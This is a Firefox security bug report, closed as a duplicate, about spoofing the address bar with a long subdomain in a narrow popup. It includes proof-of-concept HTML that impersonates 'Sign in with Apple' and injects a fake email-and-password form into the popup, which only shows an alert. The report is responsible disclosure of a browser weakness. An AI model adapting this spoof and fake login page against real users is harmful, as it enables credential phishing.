Closed
Bug 1951263
Opened 15 days ago
Closed 14 days ago
Firefox Address Bar Spoof with Long Subdomain and Popup
Categories
(Firefox :: Security, defect)
Firefox
Security
Tracking
()
RESOLVED
DUPLICATE
of bug 1598175
People
(Reporter: renwax23, Unassigned)
Details
(Keywords: reporter-external, Whiteboard: [client-bounty-form])
Attachments
(1 file)
|
1.30 MB,
image/png
|
Details |
Screenshot 2025-03-02 at 2.14.11 AM.png
The issue is simple, when opening a popup with a long subdomain the address bar prioritizes the beginning and hides the true origin of the URL. for example: (https://accounts.google.com.attacker.com) when we open it inside a small pop-up the address bar displays (https://accounts.google.com).
The address bar should display (https://...ogle.com.attacker.com) or maybe (https://accounts.google.com....) even I don't recommend this choice
POC: https://rx23.io/poc/firefox/2.html (It might not work perfectly for you as the pop-up width is crucial for the origin spoof, check the screenshot for how it should be)
POC Codes:
<title>Apple</title>
<iframe src="https://idmsa.apple.com.rx23.io/x2.html?x" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;">
</iframe>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sign in with Apple</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
}
body {
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
background: linear-gradient(to bottom, #f5f5f7, #e5e5e7);
padding: 1rem;
}
.card {
background: white;
border-radius: 20px;
box-shadow: 0 4px 24px rgba(0, 0, 0, 0.1);
width: 100%;
max-width: 400px;
padding: 2.5rem 2rem;
text-align: center;
}
.logo {
width: 40px;
height: 40px;
margin-bottom: 1.5rem;
}
h1 {
font-size: 1.5rem;
color: #1d1d1f;
margin-bottom: 0.5rem;
font-weight: 500;
}
p {
color: #86868b;
margin-bottom: 2rem;
}
.sign-in-button {
background: #000;
color: white;
border: none;
border-radius: 8px;
padding: 0.875rem 1.5rem;
font-size: 1rem;
font-weight: 500;
cursor: pointer;
display: flex;
align-items: center;
justify-content: center;
gap: 0.5rem;
width: 100%;
transition: background-color 0.2s ease;
}
.sign-in-button:hover {
background: #333;
}
.sign-in-button svg {
width: 20px;
height: 20px;
}
</style>
</head>
<body>
<div class="card">
<svg class="logo" viewBox="0 0 24 24" fill="currentColor">
<path d="M18.71 19.5c-.83 1.24-1.71 2.45-3.05 2.47-1.34.03-1.77-.79-3.29-.79-1.53 0-2 .77-3.27.82-1.31.05-2.3-1.32-3.14-2.53C4.25 17 2.94 12.45 4.7 9.39c.87-1.52 2.43-2.48 4.12-2.51 1.28-.02 2.5.87 3.29.87.78 0 2.26-1.07 3.81-.91.65.03 2.47.26 3.64 1.98-.09.06-2.17 1.28-2.15 3.81.03 3.02 2.65 4.03 2.68 4.04-.03.07-.42 1.44-1.38 2.83M13 3.5c.73-.83 1.94-1.46 2.94-1.5.13 1.17-.34 2.35-1.04 3.19-.69.85-1.83 1.51-2.95 1.42-.15-1.15.41-2.35 1.05-3.11"/>
</svg>
<h1>Welcome to Apple</h1>
<p>Continue with your Apple account</p>
<button class="sign-in-button" onclick="openWin()">
<svg viewBox="0 0 24 24" fill="currentColor">
<path d="M18.71 19.5c-.83 1.24-1.71 2.45-3.05 2.47-1.34.03-1.77-.79-3.29-.79-1.53 0-2 .77-3.27.82-1.31.05-2.3-1.32-3.14-2.53C4.25 17 2.94 12.45 4.7 9.39c.87-1.52 2.43-2.48 4.12-2.51 1.28-.02 2.5.87 3.29.87.78 0 2.26-1.07 3.81-.91.65.03 2.47.26 3.64 1.98-.09.06-2.17 1.28-2.15 3.81.03 3.02 2.65 4.03 2.68 4.04-.03.07-.42 1.44-1.38 2.83M13 3.5c.73-.83 1.94-1.46 2.94-1.5.13 1.17-.34 2.35-1.04 3.19-.69.85-1.83 1.51-2.95 1.42-.15-1.15.41-2.35 1.05-3.11"/>
</svg>
Sign in with Apple
</button>
</div>
<script>
var fake=`<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Sign In</title>
<style>
body {
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
background-color: #f3f3f3;
font-family: Arial, sans-serif;
}
.card {
background: white;
padding: 20px;
border-radius: 12px;
box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
width: 320px;
text-align: center;
}
.input-group {
position: relative;
margin-bottom: 15px;
display: flex;
align-items: center;
border: 1px solid #ccc;
border-radius: 5px;
padding: 5px;
background: white;
}
.input-group input {
width: 100%;
padding: 10px;
border: none;
border-radius: 5px;
font-size: 16px;
outline: none;
}
.input-group .icon {
margin-left: 10px;
color: #aaa;
}
.button {
width: 100%;
padding: 10px;
background: black;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.button:hover {
background: #333;
}
.forgot-password {
margin-top: 10px;
font-size: 14px;
color: #555;
}
</style>
</head>
<body>
<div class="card">
<h1>Sign in</h1>
<div class="input-group">
<span class="icon">📧</span>
<input type="email" id="email" placeholder="Email">
</div>
<div class="input-group">
<span class="icon">🔒</span>
<input type="password" id="password" placeholder="Password">
</div>
<button class="button" onclick="alert('pwned :)')">Sign In</button>
<p class="forgot-password">Forgot your password?</p>
</div>
</body>
</html>`
var win='';
function openWin() {
win=window.open("/x2.html", "", "width=326,height=500");
setTimeout(()=>{win.document.body.innerHTML=fake},500);
}
</script>
</body>
</html>
Thanks
Renwa
Flags: sec-bounty?
|
||
Updated•14 days ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 14 days ago
Duplicate of bug: 1598175
Resolution: --- → DUPLICATE
|
||
Updated•11 days ago
|
Flags: sec-bounty? → sec-bounty-
|
||
Updated•11 days ago
|
Group: firefox-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•